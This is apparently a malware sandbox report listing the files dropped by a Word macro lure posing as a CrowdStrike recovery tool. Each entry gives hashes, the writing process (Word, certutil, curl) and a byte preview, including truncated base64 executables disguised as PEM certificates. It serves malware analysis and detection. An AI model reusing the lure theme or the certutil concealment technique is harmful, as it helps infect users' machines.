                              SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                              MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                              SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                              SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                              SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                              Malicious:false
                              Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):1881952
                              Entropy (8bit):7.999066394602922
                              Encrypted:true
                              SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                              MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                              SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                              SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                              SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                              Malicious:false
                              Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):2591108
                              Entropy (8bit):7.999030891647433
                              Encrypted:true
                              SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                              MD5:BEB12A0464D096CA33BAEA4352CE800F
                              SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                              SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                              SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                              Malicious:false
                              Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):2527736
                              Entropy (8bit):7.992272975565323
                              Encrypted:true
                              SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                              MD5:F256ACA509B4C6C0144D278C7036B0A8
                              SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                              SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                              SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                              Malicious:false
                              Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):3256855
                              Entropy (8bit):7.996842935632312
                              Encrypted:true
                              SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                              MD5:8867BDF5FC754DA9DA6F5BA341334595
                              SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                              SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                              SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                              Malicious:false
                              Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):3417042
                              Entropy (8bit):7.997652455069165
                              Encrypted:true
                              SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                              MD5:749C3615E54C8E6875518CFD84E5A1B2
                              SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                              SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                              SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                              Malicious:false
                              Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                              Process:C:\Windows\SysWOW64\xcopy.exe
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):470528
                              Entropy (8bit):6.743680599799538
                              Encrypted:false
                              SSDEEP:12288:sUE03qxFqJC1cwgysc/2gIsJFBhlyAjoSYgq:sUE06qCSwgbW2gpD3sAkSYgq
                              MD5:44E5BAEEE864F1E9EDBE3986246AB37A
                              SHA1:6EDAE73E36B61B261369717EA3657A6783EBA872
                              SHA-256:4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB
                              SHA-512:DC39C1E4F59FCAC4A0A6D6B0AD890F351B5D6655B3173950B8EB4A03419311D0020D86F4868A001DF5CE270DE570B86C4F8AB86473F65E678C5A3493949305EA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: , Detection: malicious, Browse
                              • Filename: , Detection: malicious, Browse
                              • Filename: , Detection: malicious, Browse
                              • Filename: m7q7gcniEz.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.z...)...)...).cP)...).y.(...).y.(...).y.(...).t>)...).n.(...)...)=..).y.(I..).yR)...).y.(...)Rich...)........................PE..L.....~b.................4..........p........P....@..........................p............@.................................\...4.......@.......................@Q..X...T...............................@............P...............................text...i3.......4.................. ..`.rdata..J....P.......8..............@..@.data...............................@....rsrc...@...........................@..@.reloc..@Q.......R..................@..B........................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\certutil.exe
                              File Type:PEM certificate
                              Category:dropped
                              Size (bytes):647034
                              Entropy (8bit):5.673190892258134
                              Encrypted:false
                              SSDEEP:12288:UPrtm6+8lN/hrRPsd7AkAmmg69Z6kodEVX6:qtm6+qfRw7wykzK
                              MD5:D3060DEF2E808C6686CFAF57817FC583
                              SHA1:AF21A9750C95E5F475C59AF6688589700930CA40
                              SHA-256:193EED27A4566FD35994D476692979536D2B3FA0CDCF21CD98BBB6AE1A1CEE76
                              SHA-512:636B1F494C2821E264A548A0AD7AFE87E8BBEFC009D52CA57EB84B61AD4733F07E6BEDCEA634559854D5933D053525D689D3C4E3EA2164C5D456A4030E6B57CF
                              Malicious:true
                              Preview:-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACcbcN62AytKdgMrSnYDK0p..vmNQKdMMrSmKeago/gytKYp5qSjIDK0pinmuKMoMrSnRdD4plAytKaturCjRDK0p..2AysKT0MrSkZeaUoSQytKRl5UinZDK0pGXmvKNkMrSlSaWNo2AytKQAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAFBFAABMAQUAgrZ+YgAAAAAAAAAA4AACAQsBDh0ANAUA..AAACAAAAAABwEwUAABAAAABQBQAAAEAAABAAAAACAAAGAAAAAAAAAAYAAAAAAAAA..AHAHAAAEAACU2QcAAwBAwQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA..XNAGADQDAAAAAAcAQAcAAAAAAAAAAAAAAAAAAAAAAAAAEAcAQFEAAFjLBgBUAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsMsGAEAAAAAAAAAAAAAAAABQBQD8AwAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABpMwUAABAAAAA0BQAABAAA..AAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAASpkBAABQBQAAmgEAADgFAAAAAAAAAAAA..AAAAAEAAAEAuZGF0YQAAABgLAAAA8AYAAAIAAADSBgAAAAAAAAAAAAAAAABAAADA..LnJzcmMAAABABwAAAAAHAAAIAAAA1AYAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAA..QFEAAAAQBwAAUgAAANwGAAAAAAAAAAAAAAAAAEAAAEIAAAA
                              Process:C:\Windows\SysWOW64\certutil.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1412096
                              Entropy (8bit):6.154637652358107
                              Encrypted:false
                              SSDEEP:24576:gplQSK1oQplSdNkU4lH3cDyx+7LKSyUR5E:gpeZdpqEx3cWonnx
                              MD5:EB29329DE4937B34F218665DA57BCEF4
                              SHA1:1BA68F4E998EE1E405DAC983084E7EF5B2D08664
                              SHA-256:4AD9845E691DD415420E0C253BA452772495C0B971F48294B54631E79A22644A
                              SHA-512:27A252DD4E698217524568365EB951E94036E21CD4F4FCE51E84D0CC041622D0B5160B0AF30B3D030D2F580529F1C65C49A673659D5298D4E6DC0FEE1E6FF60A
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................................................X........3..................................4...<-.....<-.....<-1....<-.....Rich...........PE..d...b..f.........." ...'..... ...........................................................`......................................... w..........................8.......................p..............................@...............x............................text...u........................... ..`.rdata..B...........................@..@.data...pI.......$..................@....pdata..8...........................@..@_RDATA...............t..............@..@.rsrc................v..............@..@.reloc...............x..............@..B........................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\curl.exe
                              File Type:PEM certificate
                              Category:modified
                              Size (bytes):1941690
                              Entropy (8bit):5.32690662006021
                              Encrypted:false
                              SSDEEP:24576:5ExcWpE1q/MMQuFQCjzFhX9GwvOGigswKqmT:5EtBFBc
                              MD5:D67EA3B362D4E9B633216E85AC643D1F
                              SHA1:53D1C13DE6E049A5B41FD3B6E5876060F73D28EB
                              SHA-256:5EAF0F1C1D23F4372E24EB15EE969552C416A38DBC45E4F2B4AF283E3BFB8721
                              SHA-512:E252CC98BD44B392AF9E7B85A3FDB26385C9F678F4959DC59726F991083F44B489043E7F3DB55A1CFCE14F9CF78ABEBC77FFF26F101132ECF71348051EA255E7
                              Malicious:true
                              Preview:-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAIAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACLzqCVz6/Oxs+vzsbPr87G..hNfNx8evzsaE18vHHK/OxoTXysfer87Gz6/Oxs6vzsYL2srHuK/Oxljxz8fNr87G..DS4zxsmvzsYNLsvHla/Oxg0uysfdr87GDS7Nx92vzsaE18/H3K/Oxs+vz8Y0r87G..PC3Gx8ivzsY8Lc7Hzq/OxjwtMcbOr87GPC3Mx86vzsZSaWNoz6/OxgAAAAAAAAAA..UEUAAGSGBwBiH5pmAAAAAAAAAADwACIgCwIOJwCOEAAAIAUAAAAAAPCXAgAAEAAA..AAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAABYAAAQAAAAAAAACAGAB..AAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAACB3FADwCwAA..EIMUANwAAAAA0BUA4AEAAADwFAA4wQAAAAAAAAAAAAAA4BUAEBMAABCfEwBwAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0J0TAEABAAAAAAAAAAAAAACgEAB4BwAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAB1jRAAABAAAACOEAAABAAA..AAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAQvoDAACgEAAA/AMAAJIQAAAAAAAAAAAA..AAAAAEAAAEAuZGF0YQAAAHBJAAAAoBQAACQAAACOFAAAAAAAAAAAAAAAAABAAADA..LnBkYXRhAAA4wQAAAPAUAADCAAAAshQAAAAAAAAAAAAAAAA
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:GIF image data, version 89a, 15 x 15
                              Category:dropped
                              Size (bytes):663
                              Entropy (8bit):5.949125862393289
                              Encrypted:false
                              SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                              MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                              SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                              SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                              SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                              Malicious:false
                              Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:GIF image data, version 89a, 15 x 15
                              Category:dropped
                              Size (bytes):663
                              Entropy (8bit):5.949125862393289
                              Encrypted:false
                              SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                              MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                              SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                              SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                              SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                              Malicious:false
                              Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):1.2389205950315936
                              Encrypted:false
                              SSDEEP:3:TTml7tt:OlJ
                              MD5:3A77505CA109EE3E239693E009B4B08B
                              SHA1:07D6D8A26D477C55556BCF852ADD0AC68F1A943B
                              SHA-256:844797DDD579E6245E075DE18C11A314D246EB562FE4514318B2E24F08F1F1A6
                              SHA-512:FB82660C5463F33088CAC8F0D4D991D068DA898F471351A23EF10E6E1E230B88DC12E55DD634AC50A075AF87D31A167295071D60AA7A8629A616845FDA40CD50
                              Malicious:false
                              Preview:....$6........................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 5 05:47:15 2023, mtime=Mon Jul 22 12:58:42 2024, atime=Mon Jul 22 12:57:38 2024, length=250145, window=hide
                              Category:dropped
                              Size (bytes):803
                              Entropy (8bit):4.6713360460507145
                              Encrypted:false
                              SSDEEP:24:8ZNEZ/cPxD/juVAGuuYZOcPxD/jueGaVgm:84hcljjuYZOclDVg
                              MD5:95F4A1D616ED067F023A7EC0B778291E
                              SHA1:655C9C3A4179BB024731E688F9C15812EA162350
                              SHA-256:A6B7017110382DCA092DA15A4A823544A78EC525C2AD60D9442563150C7AB973
                              SHA-512:ADAF942F1D647AC4199A7CF8DBE00D2BF9AE500A0295A89C1CCB565B724FD7F5070391499CC66D5032AA29770A9572EEA2D4EE31E7EDE8F0EDFF9EEAD6450487
                              Malicious:false
                              Preview:L..................F.... ...B...W......B?.....?...!...........................2.!....X4o .NEW_RE~1.DOC.........EW.5.X6o..............................N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.i.n.d.o.w.s...d.o.c.m.......................-....................F.......C:\Users\user\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm..^.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.i.n.d.o.w.s...d.o.c.m.`.......X.......347688...........hT..CrF.f4... .\...Jc...-...-$..hT..CrF.f4... .\...Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Mon Jul 22 12:57:39 2024, mtime=Mon Jul 22 12:59:07 2024, atime=Mon Jul 22 12:59:07 2024, length=0, window=hide
                              Category:dropped
                              Size (bytes):1177
                              Entropy (8bit):4.6182183319459975
                              Encrypted:false
                              SSDEEP:24:8loGZEw2a0hylX4II/IQAybuTYa+Dqygm:8lU9yl5Ii+uTF9yg
                              MD5:F4D46050A93C6B8AE636EE3E3FDF34C7
                              SHA1:D059878BE25082C4B7B79EBA05B178906479E6F0
                              SHA-256:1B3CFDC5B01D8B407305E475DFA3A2825D7AE0C2EE56D1C9DA139EA9C428CB0D
                              SHA-512:070814A3A108065114D18DD0945E61D98BCC9004682DD6B8BDA257786FC6C53B9755BF727E7B9B59647355C6D3A7E2C333C380F6D0B9E610A7F174E45E5280CA
                              Malicious:false
                              Preview:L..................F.........i..?...vb"R?...vb"R?...........................e....P.O. .:i.....+00.../C:\...................x.1.....EW.2..Users.d......OwH.X.o....................:.....6.d.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1......X0o..user..B......EW<2.X2o....^.......................3.e.n.g.i.n.e.e.r.....V.1.....EW<2..AppData.@......EW<2.X.o...........................^.A.p.p.D.a.t.a.....V.1......X0o..Roaming.@......EW<2.X0o..../........................R.o.a.m.i.n.g.....\.1......X8o..MICROS~1..D......EW<2.X8o....0.......................R.M.i.c.r.o.s.o.f.t.....\.1......X=o..TEMPLA~1..D.......X4o.X=o..........................^...T.e.m.p.l.a.t.e.s.......d...............-.......c............F.......C:\Users\user\AppData\Roaming\Microsoft\Templates........\.....\.T.e.m.p.l.a.t.e.s...........................>.e.L.:..er.=....`.......X.......347688...........hT..CrF.f4... .?].j2H...-...-$..hT..CrF.f4... .?].j2H...-...-$.............1SPS.XF.L8C....&.m.q....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Generic INItialization configuration [folders]
                              Category:dropped
                              Size (bytes):184
                              Entropy (8bit):4.833152138240629
                              Encrypted:false
                              SSDEEP:3:HgA5AgFis6NAb6SQomZuMigIubNJYCm4wAgFis6NAb6SQomZuMigIubNJYCpnbJ1:HFTFipAb6WmZuMiYbNWJFipAb6WmZuM1
                              MD5:FFB95E0681E4FDDF57DBEC6B12097BA7
                              SHA1:B4E48E92A6A03FBB4297A28D8A2A7E4E4810C7F5
                              SHA-256:147DFE313AEFAE966B3548AB2DCB2A35AAE73382A0FE35E324F887B8B3E6C7AB
                              SHA-512:FF378F9327548FC0230CA67E537174FFB9F4F2A37BE0EA1471DB650C5763D1DD2E98B144716579A1C7DFEAEC8DCE2F0CB72D00FE04AD4E22A7FDC9A7B9B3B5BB
                              Malicious:false
                              Preview:[misc]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..[folders]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..Templates.LNK=0..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):562113
                              Entropy (8bit):7.67409707491542
                              Encrypted:false
                              SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                              MD5:4A1657A3872F9A77EC257F41B8F56B3D
                              SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                              SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                              SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                              Malicious:false
